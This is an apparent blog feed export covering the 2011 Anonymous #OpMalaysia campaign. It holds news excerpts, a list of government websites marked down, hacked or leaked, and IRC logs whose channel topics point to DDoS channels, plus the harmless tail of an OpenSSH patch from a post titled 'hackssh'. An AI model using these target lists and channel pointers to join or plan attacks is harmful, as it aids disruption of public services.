1,6 ****&lt;br /&gt;  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */&lt;br /&gt;  &lt;br /&gt;! #define SSH_VERSION "OpenSSH_5.8"&lt;br /&gt;  &lt;br /&gt;  #define SSH_PORTABLE "p2"&lt;br /&gt;  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE&lt;br /&gt;--- 1,6 ----&lt;br /&gt;  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */&lt;br /&gt;  &lt;br /&gt;! #define SSH_VERSION "OpenSSH_5.8" // change&lt;br /&gt;  &lt;br /&gt;  #define SSH_PORTABLE "p2"&lt;br /&gt;  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE&lt;br /&gt;&lt;/stdio.h&gt;&lt;/sys&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-8511852148549543668?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/8511852148549543668/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=8511852148549543668' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8511852148549543668'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/8511852148549543668'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/udc-hackssh-v20.html' title='uDc-hackssh-v2.0'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-SgNlc_KfJL4/SmXcNl7raxI/AAAAAAAAAoQ/6pulXodOekU/s72-c/hackpermit.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2655380834741606813</id><published>2011-06-20T10:01:00.002+08:00</published><updated>2011-06-20T10:07:19.871+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>#OpMalaysia - Die Another Day</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s200/anonymous-opmalaysia_thumb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s200/anonymous-opmalaysia_thumb.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;#OpMalaysia, another day -&lt;/b&gt; Anonops attacks has failed to get the Government full attention. The Malaysian Communications and Multimedia Commission (MCMC)&amp;nbsp;&lt;a href="http://news.hitb.org/content/mcmc-issues-statement-opmalaysia"&gt;issued a statement&lt;/a&gt; regarding the first attempt and claimed there was only a little impact on a Malaysian users as a result.&lt;br /&gt;&lt;blockquote&gt;&lt;i&gt;"Our monitoring of the situation showed that there was a reduced level of attacks by 4.00am this morning and upon further evaluation, so far we gauge that there has been little impact on Malaysian users as a result of this attack."&lt;/i&gt;&lt;/blockquote&gt;In reference to this statement, #OpMalaysia posted another statement on 17th of June to&amp;nbsp;&lt;a href="http://www.youtube.com/watch?v=Q7-JNif0wRU"&gt;youtube&lt;/a&gt; says a second round of attacks against the Government of Malaysia is planned for the &lt;b&gt;4th of July at 13:37 GMT (21:37 MYT).&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://news.hitb.org/sites/default/files/styles/large/public/field/image/opmalaysia-round2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://news.hitb.org/sites/default/files/styles/large/public/field/image/opmalaysia-round2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;i&gt;"We shall bring down the entire countries national infrastructure. We shall make this a day to be remembered. This is your second warning."&lt;/i&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2655380834741606813?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2655380834741606813/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2655380834741606813' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2655380834741606813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2655380834741606813'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/opmalaysia-die-another-day.html' title='#OpMalaysia - Die Another Day'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s72-c/anonymous-opmalaysia_thumb.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5122161327714511958</id><published>2011-06-17T12:18:00.013+08:00</published><updated>2011-06-17T20:14:11.278+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>#OpMalaysia - Day 2</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s200/anonymous-opmalaysia_thumb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="111" src="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s200/anonymous-opmalaysia_thumb.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;#OpMalaysia, day 2 - Its was a bored night, I did not find any interesting. The only thing make me stay is that to meet and watch almost of Malaysian Security Group tried to get involve and contribute 'something' that might help our country, it was like a Malaysian Security Group Reunion.&amp;nbsp;As for me, &amp;nbsp;I'd like to understand how this hacker group conduct their attack, what are the techniques, what method, what tools and etc.&lt;br /&gt;&lt;br /&gt;As for now, this group still looking for ideas how to achieve their mission as stated at &lt;a href="http://codepad.org/VFi2mktC"&gt;codepad&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;&lt;b&gt;NO attacks againts .edu and/or media.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;We protect free speech.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NO LOIC, NO TAKING DOWN, NO MATTER WHAT.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;NO DEFACING, EXCEPT FOR THE FEW CASES MENTIONED BELOW.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;NO TROLLING. DON'T BOTHER ASKING FOR DDOS TARGETS; THIS IS A NO-DDOS OPERATION.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;BE CREATIVE! ONLY WITH YOUR HELP CAN WE HAVE SUCCESS!&lt;/b&gt;&lt;br /&gt;&lt;b&gt;YOU ARE INVITED TO DISCUSS. SUBMIT YOUR SUGGESTIONS!&lt;br /&gt;&lt;br /&gt;=====================================================&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;PROBLEM&lt;/b&gt;:&lt;br /&gt;Malaysia blocks filesharing sites.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;GOAL:&lt;/b&gt;&lt;br /&gt;* Help Malaysians get around filters&lt;br /&gt;* Create media attention for the cause&lt;br /&gt;* Inform Malaysians of the existence of the op and invite them to join us&lt;br /&gt;* Make websites accessible again - either by disabling the filter or making the government disable it.&lt;br /&gt;* It's just about giving the people back their freedom&lt;br /&gt;* To tell people how ridicilous spending over 1.8 million to develop facebook page&lt;/blockquote&gt;&lt;br /&gt;#OpMalaysia channel logs - Day 2&lt;br /&gt;&lt;pre class="brush: c;gutter:false;auto-links: false;;"&gt;Session Start: Thu Jun 16 19:16:43 2011&lt;br /&gt;Session Ident: #OpMalaysia&lt;br /&gt; 10[19:16] * Now talking in #OpMalaysia&lt;br /&gt; 00[19:16] * Topic is 'NO DDOS, NO LOIC, NO TAKING DOWN - IDEAS AT http://codepad.org/VFi2mktC | DNS HOW TO VIDS http://goo.gl/8wsPi | HOW TO BYPASS FILTER: http://bit.ly/kL8yoK | ENGLISH ONLY PLEASE THANKS || Channels for DDoS: #OpV #Operationfreedom #opitaly '&lt;br /&gt; 00[19:16] * Set by Nessuno on Thu Jun 16 05:29:03&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[19:17] &lt;lovehackers&gt; ic ..&lt;br /&gt;[19:17] &lt;crazymccool&gt; ofcorse still can hack everything is hackable otherwise it would not exist due to the paradox of it not having a way in which would mean there is no use for it caust you just bought a heavy brick&lt;br /&gt; 10[19:17] * Joins: OpMalaysia977 (OpMalaysia977@AN-4ar.kbp.ipasrr.IP)&lt;br /&gt;[19:17] &lt;mib_ygc2em&gt; unbeatable skmm . hacker are loser&lt;br /&gt; 09[19:17] * Payik  11,1grabs 8,1 aL-Pacino's  11,1underwear. pulls it over 8,1 aL-Pacino's  11,1Head..... Now you look much better.&lt;br /&gt;[19:17] &lt;c1obella&gt; so, how&lt;br /&gt;[19:17] &lt;trtr3434&gt; The only thing you can't hack is the mother nature&lt;br /&gt;[19:17] &lt;sockmister&gt; updated: http://thestar.com.my/news/story.asp?file=/2011/6/16/nation/20110616104624&amp;amp;sec=nation&lt;br /&gt;[19:17] &amp;lt;%Effexor&amp;gt; Title: MCMC: 41 Govt websites disrupted at various levels (at thestar.com.my)&lt;br /&gt;[19:18] &lt;c1obella&gt; so how's the opmalaysia going on ?&lt;br /&gt;[19:18] &lt;trtr3434&gt; upgrading firewall will introduce new bug&lt;br /&gt; 10[19:18] * Parts: mysql (tsol@Y.N.W.A)&lt;br /&gt;[19:18] &lt;f4s7&gt; clobella succesfull..we dont have to do anything..the gov does&lt;br /&gt;[19:18] &amp;lt;@OnlyWork&amp;gt; If anybody needs any translation to assist the media were anonymous please ask&lt;br /&gt;[19:18] &amp;lt;@OnlyWork&amp;gt; I am neutral, I am a translator&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[19:33] &lt;mib_ygc2em&gt; http://world.yes.my/?q=ytlc&amp;amp;id=511  &amp;lt;... nice updates&lt;br /&gt;[19:33] &amp;lt;%Effexor&amp;gt; Title: Special Report: Operation Malaysia (Updated) | Yes World (at world.yes.my)&lt;br /&gt;[19:33] &lt;f4s7&gt; For more information about opMalaysia please pm devtar&lt;br /&gt;[19:33] &lt;devtar&gt; yes i am &lt;br /&gt;[19:33] &lt;bella&gt; long live Rilekscrew&lt;br /&gt;[19:33] &lt;bella&gt; haha&lt;br /&gt;[19:33] &lt;bella&gt; :D&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[04:25] &amp;lt;&amp;amp;bishop&amp;gt; where are the guys?&lt;br /&gt;[04:26] &amp;lt;&amp;amp;Cake&amp;gt; what guys&lt;br /&gt;[04:26] &lt;melayutahanlama&gt; ouhh, i wanna sleep&lt;br /&gt;[04:26] &lt;melayutahanlama&gt; bye&lt;br /&gt; 02[04:26] * Quits: zenoh (Mibbit@AN-8ue.2nv.mpq0id.IP ) (Quit: http://www.mibbit.com ajax IRC Client )&lt;br /&gt;[04:27] &amp;lt;&amp;amp;bishop&amp;gt; the malaysians&lt;br /&gt;[04:27] &amp;lt;&amp;amp;bishop&amp;gt; it's their operation &lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[04:38] &amp;lt;&amp;amp;bishop&amp;gt; they took.edu sites down.&lt;br /&gt;[04:38] &amp;lt;&amp;amp;bishop&amp;gt; that is stupid&lt;br /&gt;[04:39] &lt;zomgz&gt; yup&lt;br /&gt;[04:39] &lt;zomgz&gt; just using the op as an excuse to do their personal shit&lt;br /&gt;[04:39] &lt;omen&gt; good for pentest market &lt;br /&gt;[04:39] &lt;omen&gt; its about time&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt; 02[05:44] * Quits: &amp;amp;bishop (bishop@love.under.will ) (A TLS packet with unexpected length was received. )&lt;br /&gt;[05:45] &lt;error&gt; #OpBrazil is tomorrow help us&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt; 10[07:12] * Parts: d0ct0r (d0ct0r@anon.y.mous) (Services forced part )&lt;br /&gt; 10[07:14] * Joins: d0ct0r (d0ct0r@anon.y.mous)&lt;br /&gt; 02[07:16] * Quits: setsuna00 (chiasengkiat@AN-2fq.6qh.b7n9eh.IP ) (Quit:  )&lt;br /&gt; 10[07:18] * Joins: sluggo (Mibbit@AN-h92.d6n.j3pqkf.IP)&lt;br /&gt; 02[07:19] * Quits: d0ct0r (d0ct0r@anon.y.mous ) (Z-Lined )&lt;br /&gt; 02[07:20] * Quits: sluggo (Mibbit@AN-h92.d6n.j3pqkf.IP )&lt;br /&gt;Session Close: Fri Jun 17 07:23:30 2011&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;&lt;/error&gt;&lt;/omen&gt;&lt;/omen&gt;&lt;/zomgz&gt;&lt;/zomgz&gt;&lt;/melayutahanlama&gt;&lt;/melayutahanlama&gt;&lt;/bella&gt;&lt;/bella&gt;&lt;/bella&gt;&lt;/devtar&gt;&lt;/f4s7&gt;&lt;/mib_ygc2em&gt;&lt;/f4s7&gt;&lt;/trtr3434&gt;&lt;/c1obella&gt;&lt;/sockmister&gt;&lt;/trtr3434&gt;&lt;/c1obella&gt;&lt;/mib_ygc2em&gt;&lt;/crazymccool&gt;&lt;/lovehackers&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5122161327714511958?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5122161327714511958/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5122161327714511958' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5122161327714511958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5122161327714511958'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/opmalaysia-day-2.html' title='#OpMalaysia - Day 2'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s72-c/anonymous-opmalaysia_thumb.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3116500828392760650</id><published>2011-06-16T12:59:00.003+08:00</published><updated>2011-06-20T10:08:30.807+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>#OpMalaysia - Day 1</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s400/anonymous-opmalaysia_thumb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="112" src="http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s200/anonymous-opmalaysia_thumb.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Last night, most of Malaysian Security Community/Group join the anonops network for various reasons. The attacks started at 2330hrs Malaysian time. The hacker group is into co-ordinated attacks and keeps to its word when it comes to launching its attacks. These are likely independent hackers taking advantage of the publicity.&amp;nbsp;Some say&amp;nbsp;&lt;i&gt;"sites may not have been hacked by Anonymous."&lt;/i&gt;&amp;nbsp;CyberSecurity Malaysia, responsible for the nation's borders in cyberspace, confirmed that several websites were hacked. But it declined to say how many and which were the sites.&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;Well, these are some of the confirmed lists.&amp;nbsp;Sites tagged with [Down] indicator means either it has been DDoS-ed or switched off by government. Confirm first whether the site are down or not by visiting this page&amp;nbsp;&lt;a href="http://www.isup.me/"&gt;http://www.isup.me&lt;/a&gt;:&lt;/div&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;ol style="font-family: Verdana, sans-serif; font-size: 14px; text-align: left;"&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;- Malaysia Official Government Website [&lt;a href="http://www.malaysia.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;] –&amp;nbsp;&lt;/b&gt;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- SabahTourism.com [&lt;a href="http://pastehtml.com/view/ax3mejiup.html" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Hacked][Leaked]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- CIDB [&lt;a href="http://www.cidb.gov.my/v6/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Hacked]&lt;/b&gt;&amp;nbsp;&lt;b&gt;[Up]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- Land Public Transport Commision [&lt;a href="http://www.spad.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;i&gt;[Suspected]&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- Malaysian Meteorological Service [&lt;a href="http://www.kjc.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- ASEANconnect [&lt;a href="http://www.aseanconnect.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;i&gt;[Suspected]&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;- Hollywood-Artist.info [&lt;a href="http://hollywood-artist.info/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;i&gt;[Suspected]&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;i&gt;-&amp;nbsp;&lt;/i&gt;Ministry of Education&amp;nbsp;&lt;a href="http://www.moe.gov.my/" style="text-decoration: none;"&gt;[link]&lt;/a&gt;&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;i&gt;–&amp;nbsp;&lt;/i&gt;Suruhanjaya Pilihanraya Malaysia [&lt;a href="http://www.sprm.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;i&gt;-&amp;nbsp;&lt;/i&gt;Bomba [&lt;a href="http://www.bomba.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- TMNet [&lt;a href="http://www.tmnet.com.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Perbendaharaan Malaysia [&lt;a href="http://www.treasury.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Kementerian Kerja Raya Malaysia [&lt;a href="http://www.kkr.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Parlimen Malaysia [&lt;a href="http://www.parlimen.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;&amp;nbsp;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- JobsMalaysia [&lt;a href="http://www.jobsmalaysia.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;&amp;nbsp;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Kementerian Penerangan, Komunikasi dan Kebudayaan [&lt;a href="http://www.kpkk.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;&amp;nbsp;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Portal KSM [&lt;a href="http://orionids.net/blog/operation-malaysia-list-of-affected-websites-update/www.mohr.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&amp;nbsp;&lt;b&gt;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;&lt;/b&gt;- Majlis Sukan Negara [&lt;a href="http://www.nsc.gov.my/" style="text-decoration: none;"&gt;link&lt;/a&gt;]&lt;b&gt;&amp;nbsp;[Down]&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-indent: 0px;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;b&gt;- gengblogger.com [&lt;a href="http://gengblogger.com/" style="text-decoration: none;"&gt;link&lt;/a&gt;] [Hacked]&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;br /&gt;#OpMalaysia channel logs:&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush: c;gutter:false;auto-links: false;;"&gt;Session Start: Wed Jun 15 20:08:36 2011&lt;br /&gt;Session Ident: #OpMalaysia&lt;br /&gt; 03[20:08] * Now talking in #OpMalaysia&lt;br /&gt; 03[20:08] * Topic is ' 10Target:  7When OP takes place  10| Status:  4Up  10| Press Release:  14http://uleak.it/?3kn  10| When:  6June 15, 2011 7:30PM GMT  10| Flyer:  7http://uleak.it/?3kp  10| New to IRC or Hacking? Join  5#OpNewBlood or #Tutorials  10|Video:  11http://uleak.it/?3j7  10| VPN Guide:  